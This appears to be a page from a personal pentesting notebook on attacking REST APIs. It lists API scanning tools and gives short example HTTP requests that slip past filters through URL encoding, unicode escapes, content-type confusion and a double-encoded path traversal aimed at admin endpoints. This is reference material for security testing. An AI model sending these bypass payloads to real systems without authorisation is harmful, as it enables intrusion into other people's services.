REST API

Attack REST API

RESTful APIs are stateless, so when a consumer authenticates to these APIs, no session is created between the client and server. Instead, the API consumer must prove their identity within every request sent to the API provider’s web server.

Swagger UIJSON Injection

Swagger Jacker

CherryBomb

cherrybomb --file swagger.json --profile passive

Astra

Automated Security Testing For REST API's

Automatic API Attack Tool

URL Encoding

GET /api/%61dmin/users

Fullwidth or Homoglyph Characters

POST /api/users
Content-Type: application/json

{
  "username": "admin"
}

Mixing Encodings in Payloads

POST /api/login
Content-Type: application/json

{
  "us\u0065rname": "admin",
  "password": "letmein"
}
POST /api/users
Content-Type: application/json

{
  "username": "ad\u006din"
}

Content-Type Confusion and Polyglot Payloads

POST /api/profile
Content-Type: application/xml

{"username":"admin"}

Header and Parameter Encoding Tricks

GET /api/products?category=%252e%252e%252fadmin

Resources

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Last updated